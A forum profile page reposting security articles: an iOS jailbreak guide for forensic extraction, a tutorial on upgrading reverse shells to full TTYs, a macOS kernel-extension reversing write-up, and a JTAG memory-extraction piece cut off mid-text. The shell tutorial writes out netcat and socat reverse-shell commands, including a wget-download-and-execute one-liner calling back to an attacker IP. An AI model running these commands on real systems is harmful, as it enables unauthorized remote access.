-
Posts
18753 -
Joined
-
Last visited
-
Days Won
726
Everything posted by Nytro
-
Jailbreaking iOS 11 And All Versions Of iOS 10 POSTED BY SCAR ⋅ MARCH 30, 2018 ⋅ LEAVE A COMMENT FILED UNDER COMPUTER FORENSICS, DFIR, DIGITAL FORENSICS, IOS FORENSICS, JAILBREAKING by Oleg Afonin, Mobile Product Specialist at ElcomSoft Jailbreaking iOS is becoming increasingly difficult, especially considering the amounts of money Apple and independent bug hunters are paying for discovered vulnerabilities that could lead to a working exploit. Late last year, a bug hunter at Google’s Project Zero discovered one such vulnerability and developed and published an exploit that gave birth to a plethora of jailbreak tools for all versions of iOS 10 as well as iOS 11.0 through 11.1.2. The newly emerged jailbreaks are all exploiting the same vulnerability. Moreover, they are all using the same off-the-shelf exploit to jailbreak the device. However, there are major differences between the newly emerged jailbreaks that are worth explaining. Why Jailbreak? Mobile forensic experts use jailbreaks for a different reason compared to enthusiast users. Jailbreaking, or obtaining root-level access to the file system, is a required pre-requisite for most physical acquisition tasks as it exposes the file system to forensic acquisition tools, helping circumvent iOS sandbox protection and access protected app data. Jailbreaking the device helps experts extract the largest amount of data from the device. During jailbreaking, many software restrictions imposed by iOS are removed through the use of software exploits. Jailbreaking in general performs multiple tasks such as escaping the sandbox, bypassing kernel patch protection. For the mobile forensic expert, jailbreaking permits root access to the file system and allows establishing SSH connectivity to the device. This, in turn, allows accessing and extracting data that would be otherwise guarded by the operating system. In this article, we’ll review the five latest jailbreaks for iOS 10.0 through 10.3.3 and 11.0 through 11.1.2. iOS 10.0-10.3.3 (32-bit): h3lix iOS 10.0-10.3.3 (64-bit): doubleH3lix, Meridian iOS 10.3.x (64-bit, A7-A9 only): g0blin iOS 11.0-11.1.2: LiberIOS iOS 11.0-11.1.2: Electra Before we review the individual jailbreak tools, let us first see what they have in common. What Is a Jailbreak? Jailbreaking modern versions of iOS is an extremely complex process exploiting multiple vulnerabilities in various parts of the OS to defeat the systems’ security measures. In general terms, a jailbreak performs the following steps: Sandbox Escape: during this stem, the jailbreak tool utilizes an exploit allowing it to access components it does not have the permissions to. Privilege Escalation: the jailbreak gains elevated privileges allowing it to access protected resources (e.g. mount the root file system, patch the kernel, inject code etc.) KPP Bypass: disables or works around the code signing check, which allows modifications to the file system without making the device unbootable, causing a bootloop or random reboots. While getting more complicated, modern jailbreak tools are safer to use. Starting with iOS 11, all jailbreaks are utilizing the same installation procedure. A failed jailbreak does not cause system instability, and does not required reinstalling iOS in order to perform another attempt. General Implications of Jailbreaking The main purpose of a jailbreak is circumventing iOS security measures. A jailbroken device becomes vulnerable to attacks and malicious code unimaginable on a non-jailbroken device. Since a jailbreak allows installed unsigned code, an jailbroken iOS device starts behaving much like Android devices with the “Allow installation from unknown sources” option turned on. In addition, sideloaded apps on jailbroken devices may obtain full access to other apps’ sandboxed space, thus accessing personal (and highly secure) information they were never meant to. Forensic Implications of iOS 10 and 11 Jailbreaks Jailbreak tools are exploiting vulnerabilities. They can be picky, only supporting certain combinations of software (version of iOS) and hardware, allowing or disallowing third-party software repositories (Cydia) and potentially having other limitations. Installing a jailbreak brings the following forensic consequences. System and data partitions modified. A jailbreak unavoidably modifies both the system and user data partitions. This must be documented in order to maintain evidence admissibility. The jailbreak installation procedure (starting with iOS 10) requires a working Internet connection (to at least ppq.apple.com) from both the computer and the iOS device being jailbroken. If the iOS device has an outstanding remote wipe or iCloud lock request, it might be locked the instant the connection is established. Contacting Apple to ensure there are no such requests (as well as blocking subsequent requests) is a good idea. Jailbreaking an iOS device modifies both user data and system partitions. These modifications must be properly documented to maintain admissibility of collected evidence. At this time, it is not possible to perform a clean removal of the jailbreak. Modifications performed to the system partition are persistent; even a factory reset would not remove the jailbreak. While some jailbreak tools (e.g. Electra) claim to create an APFS snapshot to allow restoring the system to pre-jailbreak condition in the future, there are currently no tools available to perform such restore. Experts must carefully consider the above implications before attempting to jailbreak a device. Installing a Jailbreak All jailbreaks for iOS 10 and iOS 11 share a common installation procedure. Steps to jailbreak: Back up data with iTunes or Elcomsoft iOS Forensic Toolkit (if backup password is empty, specify and record a temporary password). Obtain and install the jailbreak tool using the appropriate links. This includes two files: The jailbreak IPA file Cydia Impactor available at http://www.cydiaimpactor.com/ Cydia Impactor (developed by Saurik) is used to sign the IPA file so that the jailbreak tool can be executed on iOS devices. You will need to use valid Apple ID credentials for signing the IPA. We recommend using a newly created Apple ID for signing the certificate. Connect the iOS device to the computer, trust the computer on the iOS device and launch Cydia Impactor. Drag the jailbreak IPA onto Cydia Impactor app. Provide Apple ID and password when prompted. Click OK to allow Cydia Impactor to sign the IPA and upload it onto the iOS device. (A disposable Apple account is recommended; there is no need to use the same Apple ID as the main ID on the device). Cydia Impactor will sideload the IPA file onto the iOS device. If you attempt to launch the jailbreak IPA at this time, the attempt fill fail as the digital certificate for that app is not yet trusted. You will need to trust the certificate in order to be able to launch the jailbreak. To do that, on the iOS device, open Settings > General > Device Management. You will see a developer profile under the “Apple ID” heading. Tap the profile to establish trust for this developer. (An Internet connection is required to verify the app developer’s certificate when establishing trust.) On the iOS device, find the jailbreak app and run it. Follow the on-screen instructions. After you jailbreak, the device will respring. Note that neither jailbreak will install the Cydia app; however, the jailbreak may already include a working SSH daemon (make sure to specify the correct port number in iOS Forensic Toolkit, which can be 22 or 2222). If it does not, you’ll have to install OpenSSH from Cydia. If the built-in SSH daemon does not work on either port number, download and install OpenSSH from Cydia. A working SSH connection is required to perform physical acquisition. iOS 11 Jailbreaks There are two jailbreaks supporting physical acquisition with iOS Forensic Toolkit that are compatible with iOS 11.0 through 11.1.2. The LiberIOS and Electra jailbreaks are based on the exploit discovered by Google Project Zero. Both jailbreaks are compatible with iOS Forensic Toolkit. If one of the two jailbreaks does not work for a particular combination of hardware and iOS version, you may try rebooting the device and applying a different jailbreak. LiberIOS: http://newosxbook.com/liberios/ Electra: https://coolstar.org/electra/ At this time, only the Electra jailbreak supports Cydia. LiberIOS does not support Cydia. The latest build of Electra does support Cydia, with Dropbear SSH daemon running on port 22. Both jailbreaks employ a so-called ‘KPP-less’ approach to jailbreaking. In this approach, the jailbreak does not patch or otherwise alter the state of Apple’s Kernel Patch Protection (KPP) service that checks file system integrity during boot and then periodically while the system is running. All previous jailbreaks used to patch KPP (a so-called ‘KPP bypass’ approach). More information about KPP and how it was patched in earlier jailbreaks is available in How Kernel Patch Protection Works and How Hackers Bypass KPP. LiberIOS and Electra employ a different approach, leaving KPP alone and writing into different areas of the file system instead. While this approach leads to a potentially more stable jailbreak, it also limits the ability to run Cydia Substrate, requiring its complete rework. At this time, only the Electra jailbreak managed to include a working copy of Cydia in iOS 11. In addition, the Electra jailbreak will create a APFS snapshot immediately after jailbreaking. The APFS snapshot can be best described as a file system-level restore point allowing you to roll back the root file system to exactly the state it was immediately after jailbreaking. By performing a factory reset afterwards, you will get a clean system without any traces of jailbreaking. Do note, however, that using the APFS snapshot to roll back the device requires a not yet released tool called SemiRestore11. According to Electra jailbreak developer, this is how it works: Prior to jailbreaking, Electra RC 3.x/final release will check if your device is in a somewhat clean state If it is not in a somewhat clean state, it’ll give you a warning message and ask if you want to continue jailbreaking anyways However, if it is in a clean state, it will take an APFS snapshot of the root filesystem (/) Later on, if you would like to utilize SemiRestore, it will tell APFS to revert to the snapshot that Electra created when the device was first jailbroken After the APFS snapshot of the rootfs is reverted, you can “Reset all Contents and Settings” (which will wipe /var) and you will have a stock iPhone on iOS 11.0 – 11.1.2! Both LiberIOS and Electra jailbreaks are semi-tethered. If you reboot the device, you will have to re-run the jailbreak app to activate the jailbreak. The jailbreak will expire after 7 days, after which you will have to re-run the entire procedure starting with using Cydia Impactor on your computer. iOS 10 Jailbreaks There are several iOS 10 jailbreaks based on the same vulnerability as the jailbreaks for iOS 11. The h3lix (https://h3lix.tihmstar.net/) jailbreak supports all 32-bit devices that are running any iOS version between 10.0 and 10.3.3. h3lix is the only 32-bit jailbreak covering all versions of iOS 10 that is supported by iOS Forensic Toolkit. The same developer released a version of the h3lix jailbreak for 64-bit devices running all versiosn of iOS 10.0 through 10.3.3. The doubleH3lix (https://doubleh3lix.tihmstar.net/) jailbreak includes Cydia repository, but comes without a built-in SSH client. Installing OpenSSH from the Cydia store is obligatory to perform physical acquisition. In our tests, we discovered that OpenSSH may not work immediately after the installation, requiring a phone reboot. After rebooting the phone, one must wait for 3 to 5 minutes before re-applying the jailbreak; otherwise, the jailbreak may fail with “Kernel exploit failed” error followed by another reboot. The Meridian (https://meridian.sparkes.zone/) jailbreak supports all 64-bit devices that are running any iOS version between 10.0 and 10.3.3. Notably, the iPhone 8, 8 Plus and iPhone X are missing from the list of supported devices as they were released with iOS 11 out of the box. Meridian is a KPP-less jailbreak. KPP-less is a new style of jailbreaking which avoids writing to certain protected areas of the kernel; this may cause issues with Cydia Substrate. g0blin (https://g0blin.sticktron.net/) is a specific jailbreak that targets a limited set of iOS versions running on certain hardware. Specifically, the g0blin jailbreak targets iOS 10.3 through 10.3.3 running on devices equipped by A7 through A9 chip sets. This includes the iPad 5, iPad Air and Air 2, iPad Pro (2015), iPad mini 2 through 4, iPod Touch 6, as well as iPhone 5s, 6/Plus, SE and 6s/Plus. The reason for choosing this specific jailbreak would be compatibility. The g0blin jailbreak supports Cydia; the RC1 version of this tool includes dropbear SSH (the RC2 drops dropbear support, making you install OpenSSH instead from the pre-installed Cydia app). For this reason, consider using either g0blin_rc2.ipa or the older g0blin_rc1.ipadepending on your requirements. The RC2 supports a larger (yet unspecified) set of iOS/hardware combinations, while the RC1 includes dropbear SSH without the need to launch Cydia to manually install OpenSSH. What Next? Installing a jailbreak is a required pre-requisite for physical extraction. The process of physical extraction is described in Breaking into iOS 11. An alternative to physical extraction is logical acquisition, which can be performed even on a locked device if a lockdown file (iTunes pairing record) is available. However, using existing pairing records becomes more complicated as iOS 11.3 limits the lifespan of lockdown records. Conclusion We described the differences between jailbreaks utilizing the newly discovered vulnerability published by Google Project Zero, and covered the steps to install and (for iOS 11 Electra jailbreak) uninstall the jailbreaks. Founded in 1990, ElcomSoft Co. Ltd. is a leading developer of digital forensics tools. The company offers state-of-the-art solutions for businesses, forensic and law enforcement specialists, provides training and consulting services on mobile and computer forensics. Sursa: https://articles.forensicfocus.com/2018/03/30/jailbreaking-ios-11-and-all-versions-of-ios-10/
-
Upgrading simple shells to fully interactive TTYs 10 JULY 2017 EMAIL TWITTER REDDIT Table of Contents Generating reverse shell commands Method 1: Python pty module Method 2: Using socat Method 3: Upgrading from netcat with magic tl;dr cheatsheet Every pentester knows that amazing feeling when they catch a reverse shell with netcat and see that oh-so-satisfying verbose netcat message followed by output from id. And if other pentesters are like me, they also know that dreadful feeling when their shell is lost because they run a bad command that hangs and accidentally hit "Ctrl-C" thinking it will stop it but it instead kills the entire connection. Besides not correctly handling SIGINT, these"dumb" shells have other shortcomings as well: Some commands, like su and ssh require a proper terminal to run STDERR usually isn't displayed Can't properly use text editors like vim No tab-complete No up arrow history No job control Etc... Long story short, while these shells are great to catch, I'd much rather operate in a fully interactive TTY. I've come across some good resources that include very helpful tips and techniques for "upgrading" these shells, and wanted to compile and share in a post. Along with Pentest Monkey, I also learned the techniques from Phineas Fisher in his released videos and writeups of his illegal activities: Pentest Monkey - Post Exploitation Without a TTY Phineas Fisher Hacks Catalan Police Union Website Phineas Fisher - Hackingteam Writeup For reference, in all the screenshots and commands to follow, I am injecting commands in to a vulnerable web server ("VICTIM") and catching shells from my Kali VM ("KALI"): VICTIM IP: 10.0.3.7 KALI IP: 10.0.3.4 Generating reverse shell commands Everyone is pretty familiar with the traditional way of using netcat to get a reverse shell: nc -e /bin/sh 10.0.3.4 4444 and catching it with: nc -lvp 4444 The problem is not every server has netcat installed, and not every version of netcat has the -e option. Pentest Monkey has a great cheatsheet outlining a few different methods, but my favorite technique is to use Metasploit's msfvenom to generate the one-liner commands for me. Metasploit has several payloads under "cmd/unix" that can be used to generate one-liner bind or reverse shells: Any of these payloads can be used with msfvenom to spit out the raw command needed (specifying LHOST, LPORT or RPORT). For example, here's a netcat command not requiring the -e flag: And here's a Perl oneliner in case netcat isn't installed: These can all be caught by using netcat and listening on the port specified (4444). Method 1: Python pty module One of my go-to commands for a long time after catching a dumb shell was to use Python to spawn a pty. The pty module let's you spawn a psuedo-terminal that can fool commands like su into thinking they are being executed in a proper terminal. To upgrade a dumb shell, simply run the following command: python -c 'import pty; pty.spawn("/bin/bash")' This will let you run su for example (in addition to giving you a nicer prompt) Unfortunately, this doesn't get around some of the other issues outlined above. SIGINT (Ctrl-C) will still close Netcat, and there's no tab-completion or history. But it's a quick and dirty workaround that has helped me numerous times. Method 2: Using socat socat is like netcat on steroids and is a very powerfull networking swiss-army knife. Socat can be used to pass full TTY's over TCP connections. If socat is installed on the victim server, you can launch a reverse shell with it. You must catch the connection with socat as well to get the full functions. The following commands will yield a fully interactive TTY reverse shell: On Kali (listen): socat file:`tty`,raw,echo=0 tcp-listen:4444 On Victim (launch): socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 If socat isn't installed, you're not out of luck. There are standalone binaries that can be downloaded from this awesome Github repo: https://github.com/andrew-d/static-binaries With a command injection vuln, it's possible to download the correct architecture socat binary to a writable directoy, chmod it, then execute a reverse shell in one line: wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 On Kali, you'll catch a fully interactive TTY session. It supports tab-completion, SIGINT/SIGSTP support, vim, up arrow history, etc. It's a full terminal. Pretty sweet. Method 3: Upgrading from netcat with magic I watched Phineas Fisher use this technique in his hacking video, and it feels like magic. Basically it is possible to use a dumb netcat shell to upgrade to a full TTY by setting some stty options within your Kali terminal. First, follow the same technique as in Method 1 and use Python to spawn a PTY. Once bash is running in the PTY, background the shell with Ctrl-Z While the shell is in the background, now examine the current terminal and STTY info so we can force the connected shell to match it: The information needed is the TERM type ("xterm-256color") and the size of the current TTY ("rows 38; columns 116") With the shell still backgrounded, now set the current STTY to type raw and tell it to echo the input characters with the following command: stty raw -echo With a raw stty, input/output will look weird and you won't see the next commands, but as you type they are being processed. Next foreground the shell with fg. It will re-open the reverse shell but formatting will be off. Finally, reinitialize the terminal with reset. Note: I did not type the nc command again (as it might look above). I actually entered fg, but it was not echoed. The nc command is the job that is now in the foreground. The reset command was then entered into the netcat shell After the reset the shell should look normal again. The last step is to set the shell, terminal type and stty size to match our current Kali window (from the info gathered above) $ export SHELL=bash $ export TERM=xterm256-color $ stty rows 38 columns 116 The end result is a fully interactive TTY with all the features we'd expect (tab-complete, history, job control, etc) all over a netcat connection: The possibilities are endless now. Tmux over a netcat shell?? Why not? tl;dr cheatsheet Cheatsheet commands: Using Python for a psuedo terminal python -c 'import pty; pty.spawn("/bin/bash")' Using socat #Listener: socat file:`tty`,raw,echo=0 tcp-listen:4444 #Victim: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 Using stty options # In reverse shell $ python -c 'import pty; pty.spawn("/bin/bash")' Ctrl-Z # In Kali $ stty raw -echo $ fg # In reverse shell $ reset $ export SHELL=bash $ export TERM=xterm-256color $ stty rows <num> columns <cols> Any other cool techniques? Let me know in the comments or hit me up on twitter. Enjoy! -ropnop Sursa: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
-
- 1
-
-
Reversing a macOS Kernel Extension
Nytro posted a topic in Reverse engineering & exploit development
Reversing a macOS Kernel Extension Oct 11, 2016 #kernel , #macOS , #lldb , #IDA In my last post I covered the basics of kernel debugging in macOS. In this post we will put some of that to use and work through the process of reversing a macOS kernel module. As I said in my last post, in macOS there is a kernel module named “Don’t Steal Mac OS X” (DSMOS) which registers a function with the Mach-O loader to unpack binaries that have the SG_PROTECTED_VERSION_1 flag set on their __TEXT segment. Finder, Dock, and loginwindow are a few examples of binaries that have this flag set. My goal for this post is to simply work through the kernel module with the intent of discovering its functionality and use it as an opportunity to learn a bit about kernel debugging. If you’d like to follow along I pulled the DSMOS module off of a laptop running macOS Sierra Beta (16A286a). Based on cursory looks at a couple copies from different versions of macOS it hasn’t changed much recently so you should be able to follow along with a copy from Mac OS X 10.11 or macOS Sierra. As you’ll see in the screenshots, I used IDA Pro for this reversing however using a program like Hopper would be fine as well. First Look At a glance, the DSMOS kernel module is fairly simple in terms of number of functions. It has 25 functions of which we only really care about 6. Most of the functions we don’t care about are constructors or destructors. Admittedly I haven’t taken the time to understand constructors and destructors used by a kernel module sp will be skipping them in this post. Typically when I first look at a binary I start by looking at the strings in the binary. Strings in DSMOS kernel module As seen in Figure 1, there really aren’t that many strings and they aren’t all that exciting. The most interesting is probably the string “AppleSMC” which is an indicator that this module interacts with the System Management Controller. Given that there are so few functions in this binary my approach was to simply go through each of them, have a quick look at the control flow graph (CFG) for a rough estimate of complexity, and put the function either on the “care” or “don’t care” list. Doing this I ended up with 9 functions of interest (see Table 1). Address Name 00000A9E sub_A9E 00000B2A sub_B2A 00000D30 sub_D30 00000E9E sub_E9E 0000125A sub_125A 00001616 sub_1616 00001734 sub_1734 00001C48 sub_1C48 00001C94 sub_1C94 Table 1: Potentially interesting function addresses and associated names. With these functions as starting points, the next step is to start working through them. At this point our goal is identify what each functionality each provides. Registering an IOService Notification Handler Main block of code in sub_A9E The relevant block of code from sub_A9E is shown in Figure 2. In words, this function first retrieves a matching dictionary for the AppleSMC service then installs a notification handler that is called when IOKit detects a service with the class name AppleSMC has been registered. In the call to IOService::addNotification() shown in Figure 2 the first argument is the address of the hanlder to be called. This handler is labelled as notificationHanlder in Figure 2 and not listed in Table 1 (it was a false negative); its located at address 00000B1A with a default name in IDA of sub_B1A. sub_B1A isn’t all that interesting, all it does is wrap sub_B2Adropping some arguments in the process. The Notification Handler When an IOService registers the AppleSMC class the code in sub_B2A will be notified. This function begins by calling OSMetaClassBase::safeMetaCast()to cast the incoming service into an AppleSMC service. Note that Apple’s documentation states that developers should not call OSMetaClassBase methods directly and should instead use provided macros. In this case, the call safeMetaCast() was likely generated by using the OSDynamicCastmacro which Apple lists as a valid macro to be used by developers. The next block in sub_B2A, shown in Figure 3, is where things actually start. Querying SMC for key Since C++ is horribly annoying to reverse due to all the indirect calls, rather than figuring out what method is represented by rax+850h I turned to Google. Searching for OSK0 and OSK1 turns up an article posted by Amit Singh. In it he talks briefly about an older version of the DSMOS kernel extenion and also provides code that uses the OSK0 and OSK1 strings to query the SMC for two keys. Once these keys have been acquired the kernel extension then computes a SHA-256 hash and compares to a value stored in memory. If this comparison fails, an error is printed (not shown). If the hashes match then we skip to the block shown in Figure 4. Installing DSMOS hook The first part of this basic block takes the address of byte_3AA4 and our keys returned from the SMC then calls sub_1616. If you look at sub_1616you’ll see it contains a couple loops and a bunch of byte manipulation I didn’t want to reverse. Looking at where byte_3AA4 is used you’ll see it is used in two places: here in sub_B2A and in sub_D30. Let’s wait a bit to see how it is used before figuring out how it is generated. After the call to sub_1616 we have two AES decryption keys set. The first key is the value returned from the SMC when queried with OSK0 and the second key is the value returned when OSK1 is used to query the SMC. Finally, we see a global variable named initialized set to 1 and a call to dsmos_page_transform_hook with the address of sub_D30 as a parameter. void dsmos_page_transform_hook(dsmos_page_transform_hook_t hook) { printf("DSMOS has arrived\n"); /* set the hook now - new callers will run with it */ dsmos_hook = hook; } Listing 1: Source code for dsmos_page_transform_hook from XNU source Searching for dsmos_page_transform_hook in the XNU source we find the code in Listing 1. This is a pretty simple funciton that simply sets the value of dsmos_hook to the provided function address. Usage of dsmos_hook in XNU At this point we will take step briefly away from IDA and kernel extension turning our attention to the XNU source. For this work I used the source of XNU 3248.60.10 which is the version used by Mac OS X 10.11.6. If you haven’t done so already, you can download the source from http://opensource.apple.com/release/os-x-10116/. As we saw, dsmos_page_transform_hook simply set the value of dsmos_hook. Continuing from here we find that dsmos_hook is only used in dsmos_page_transform_hook as we saw and in dsmos_page_transform(Listing 2). int dsmos_page_transform(const void* from, void *to, unsigned long long src_offset, void *ops) { static boolean_t first_wait = TRUE; if (dsmos_hook == NULL) { if (first_wait) { first_wait = FALSE; printf("Waiting for DSMOS...\n"); } return KERN_ABORTED; } return (*dsmos_hook) (from, to, src_offset, ops); } Listing 2: Usage of dsmos_hook by XNU After ensuring dsmos_hook the code in LIsting 2 just calls the hook with the parameters passed to dsmos_page_transform. This approach allows Apple some flexibility and opens up the opportunity to have multiple hooks in the future. Once again searching the XNU source, we see that the only use of dsmos_page_transform is in a function called unprotect_dsmos_segment. I have not included the source of unprotect_dsmos_segment since it is a bit longer and also not very exciting. The most interesting part about it is that it checks to see that the segment is long enough before attempting to call dsmos_page_transform on it. Continuing along, unprotect_dsmos_segment is only called by load_segment. load_segment is a much larger function and is not shown in its entirety but the relevant portion is shown in Listing 3. if (scp->flags & SG_PROTECTED_VERSION_1) { ret = unprotect_dsmos_segment(file_start, file_end - file_start, vp, pager_offset, map, vm_start, vm_end - vm_start); if (ret != LOAD_SUCCESS) { return ret; } } Listing 3: Call to unprotect_dsmos_segment from load_segment The interesting part of the code in Listing 3 is that unprotect_dsmos_segment is only called on segments with the SG_PROTECTED_VERSION_1 flag set. As mentioned earlier, macOS only includes a few binaries with this flag set such as Finder, Dock, and loginwindow. Main functionality of hook function The Hook Implementation At this point we know that the DSMOS kernel extension queries the SMC for a pair of keys, initializes some AES decryption contexts and global variables, then installs a hook by calling dsmos_page_transform_hook. We also know that the Mach-O loader in the kernel will call this hook when it finds a segment with the SG_PROTECTED_VERSION_1 flag set. The next question then is: what does the hook installed by the DSMOS kernel extension actually do? Main functionality of hook function Prior to the code shown in Figure 5 is the function prologue and setting of a stack cookie; after the code is the checking of the stack cookie and function epilogue. The code shown starts by checking to see if the initialization flag is set. This is the same initialization flag we saw being set in sub_B2A (see Figure 4). If this flag is not set the function exits, otherwise it enters a series of checks to identify which kernel is calling the hook. Searching the XNU source you can find the constant 0x2e69cf40 in the implementation of unprotect_dsmos_segment as shown in Listing 4. struct pager_crypt_info crypt_info; crypt_info.page_decrypt = dsmos_page_transform; crypt_info.crypt_ops = NULL; crypt_info.crypt_end = NULL; #pragma unused(vp, macho_offset) crypt_info.crypt_ops = (void *)0x2e69cf40; vm_map_offset_t crypto_backing_offset; crypto_backing_offset = -1; /* i.e. use map entry's offset */ Listing 4: XNU setting value of crypt_info.crypt_ops As Figure 5 shows, there are three basic cases implemented in the hook: no protection, an old kernel, and a new kernel. The basic block responsible for each case is labelled accordingly. I did not try to figure out which kernels mapped to which version however if you read the article by Amit Singhyou’ll notice that he talks about the method where each half of the page is encrypted with one of the SMC keys. In our kernel extension this corresponds to the old_kernel basic block. The method currently in use by Apple starts at the basic block labelled as new_kernel in Figure 5. In it we see an 8 byte buffer is zeroed then a call is made to a function I’ve called unprotect (named sub_1734 by IDA originally). Looking at the parameters to unprotect we see it takes the global buffer byte_3AA4 we saw earlier, the source buffer containing the page to be transformed, and the destination buffer to store the transformed page in among other parameters. This is the point in our reversing where things become very tedious since Apple has moved away from using AES to encrypt the pages to a custom method composed of many byte operations (e.g. shift left/right, logical/exclusive or). Unprotecting a Protected Page To properly set expectations, due to the tedious nature of this protection mechanism and me being somewhat satisfied with what I’ve learned so far I did not go through the full exercise of reversing Apple’s “unprotect” method. Originally I had intended to write a program that would be able to apply the transform to a given binary but that program is only partially completed and does not work. So, with expectations set sufficiently low lets get a feel for the implementation and a couple ways of approaching it. First lets step back briefly. Remember we saw the global variable byte_3AA4being initialized in sub_B2A and that I had said the code for that was also incredibly tediuous? Well, thanks to the ability to dump memory from the kernel through the debugger we don’t need to reverse it at all. We just need to connect to a running kernel and ask it politely. Dumping byte_3AA4 From a Running Kernel If you are unclear about how to use the kernel debugger then check out my previous post. To get started, on your remote machine start the debugger by hitting the NMI keys (left command, right command, and power together) then connect to the debugger from your local machine. The following lldb sessions shows the steps all put together. (lldb) kdp-remote 192.168.42.101 Version: Darwin Kernel Version 16.0.0: Fri Aug 5 19:25:15 PDT 2016; root:xnu-3789.1.24~6/DEVELOPMENT_X86_64; UUID=4F6F13D1-366B-3A79-AE9C-4 4484E7FAB18; stext=0xffffff802b000000 Kernel UUID: 4F6F13D1-366B-3A79-AE9C-44484E7FAB18 Load Address: 0xffffff802b000000 ... Process 1 stopped * thread #2: tid = 0x00b8, 0xffffff802b39a3de kernel.development`Debugger [inlined] hw_atomic_sub(delt=1) at locks.c:1513, name = '0xffffff8 037046ee0', queue = '0x0', stop reason = signal SIGSTOP frame #0: 0xffffff802b39a3de kernel.development`Debugger [inlined] hw_atomic_sub(delt=1) at locks.c:1513 [opt] (lldb) showallkexts OverflowError: long too big to convert UUID kmod_info address size id refs TEXT exec size version name ... B97F871A-44FD-3EA4-BC46-8FD682118C79 0xffffff7fadf449a0 0xffffff7fadf41000 0x5000 130 0 0xffffff7fadf41000 0x5000 7.0.0 com.apple.Dont_Steal_Mac_OS_X ... (lldb) memory read --force --binary --outfile byte_3AA4.bin 0xffffff7fadf44aa4 0xffffff7fadf44aa4+4172 4172 bytes written to '/Users/dean/Sites/lightbulbone.github.io/byte_3AA4.bin' We start out by connecting to the remote host using the kdp-remotecommand. Once everything has loaded we can get the address of the DSMOS kernel extension in memory using the showallkexts command. In my case the base address is 0xffffff7fadf41000. We then read the memory at address 0xffffff7fadf44aa4 which is the extension base address plus the offset of 0x3aa4; we read 4172 bytes since that is the size of the buffer. If you were writing a program to unprotect binaries you could use this extracted binary blob rather than trying to reverse the initialization algorithm. Emulating the Unprotect Algorithm Due to the tedious nature of the algorithm used to “unprotect” a page I decided to try using the Unicorn Engine to emulate it. This effort largely failed because it meant I would have to set up memory in Unicorn the same way as it is in the kernel extension and, as I said, the motivation wasn’t quite there. As far as I know this is possible however it to can be rather tedious; especially in cases where the algorithm isn’t as self-contained as in this case. Using an IDA plugin such as sk3wldbg may help however I was not aware of it at the time. Reversing the Unprotect Algorithm In the end I just sat down and started working through the algorithm in IDA. I did begin to write a program to unprotect before my motivation to work through the tedious code fell through the floor. For me, looking at DSMOS was an opportunity to learn what a kernel module I’ve known about for many years and become more familiar with the macOS kernel. That being said a few things a worth pointing out. Loop found in sub_1734 In Figure 6 a portion of sub_1734 is shown. In it we see the first eight bytes of the from pointer (stored in r14) being used to build a value to pass to sub_125A. Unrolled loop in sub_125A And, in Figure 7 we see part of sub_125A. In this part we see the first two iterations of an unrolled loop. The point of Figures 6 and 7 is to show some common constructs that come up when reversing code. If you’re not familiar with these constructs it may help to write some code yourself and then analyze the binary after compilation. Summary The intent of this post was to reverse engineer the DSMOS kernel extension in macOS. The goal was to understand what functionality the DSMOS extension provided to the kernel and to become more familiar with the XNU kernel. We also touched on IOKit briefly as well as a possible application of the Unicorn engine. If you have any questions or comments, please feel to reach out to me on Twitter @lightbulbone. Sursa: https://lightbulbone.com/posts/2016/10/dsmos-kext/ -
JTAG on-chip debugging: Extracting passwords from memory Published 29/03/2018 | By ISA Following on from my colleague’s post on using UART to root a phone, I look at another of our challenges, whereby sensitive information such as passwords can be extracted from a device’s memory if physical access to the device is acquired. The goal and target BroadLink RM Pro Smart Remote Control The target device is the BroadLink RM Pro universal remote control designed for home convenience and automation. This smart remote control can be used to control multiple home appliances through its application. It also allows users to create scenarios whereby multiple actions can be programmed and activated simultaneously. Device setup and functionality is accessed through the BroadLink e-Control application. This application must be running on a device connected to the same Wi-Fi network as the smart remote and the appliance you want to control. BroadLink e-Control application For the purpose of this challenge, setting up the device is required. In a real scenario, the device would likely already be set up. Start by connecting the smart remote to a Wi-Fi network and entering the Wi-Fi SSID and Passphrase within the e-Controls application. The application then subsequently tries to locate the device within the network and once it is found, a connection is established. Now that the smart remote is functional, an attacker who has physical access to the device may attempt to extract configuration or sensitive information loaded in memory. Successfully replicating this attack scenario is the main goal of this challenge. Taking a look inside The first step is to investigate the internal components of the device, starting by carefully taking apart the unit. There are three easily removable housing screws situated on the underside of the device. Once opened, we can then identify different points of interest within the device. These can be internal or external ports, the board’s chips, components, model and serial numbers. Identifying the chip’s model and serial number is essential and will provide us with the information we need in latter stages. Inside BroadLink RM Pro Smart remote Looking for ways to communicate with the device is another key step. When working with embedded architectures, the presence of debug interfaces such as UART and JTAG is a common method used to establish serial connectivity to the device. JTAG Joint Test Action Group or more simply JTAG, is a standardised type of serial communication commonly used by engineers and developers to perform on-board testing or diagnostics of embedded devices, also known as boundary scanning. Another functionality of JTAG, which is seemingly more used today, is CPU level debugging allowing read-write access to registers and memory. The JTAG interface uses four connection points also known as Test Access Port or TAP. These connection points correspond to four signals: TDI – Test Data In; this signal represents input data sent to the device TDO – Test Data Out, which represents output data from the device TCK – Test Clock, used to synchronise data from the TMS and TDI (rising edge of Test Clock) and TDO (falling edge of Test Clock) TMS – Test Mode Select; this signal is used to control the state of the TAP controller TRST – Test Reset; this is an optional signal used for resetting the TAP controller Identifying JTAG pinouts The implementation of JTAG is non-standardised, which means that the signal pinouts you may encounter will vary between devices. Aside from the standalone JTAG connection points, commonly seen JTAG interfaces may be a part of a 10 pin, 14 pin, 16 or 20 pin header. JTAG pinouts Looking closely at the device, the five connection points on the corner of the board is the JTAG interface. Using the JTAG’s debugging functionality should enable us to read and write data stored in memory. Note: Some devices will have JTAG present but their connections will have been disabled before being released into production. There are various tools available which can be used to identify JTAG signal pinouts, all of which vary in available features and pricing. Common examples are JTAGenum (for Arduino), JTAGulator and Hydrabus to name a few. For the purpose of this challenge, a JTAGulator is used. The JTAGulator supports a number of functionalities, including both the identification of UART and JTAG pinouts. The JTAGulator Connecting the JTAGulator The JTAGulator is connected to the smart remote starting from the lowest number of channels/pins on the board (CH0-CH4). The lowest numbered pinouts are used due to the brute-force method used by the JTAGulator to identify the signal value for each pinout. Using the 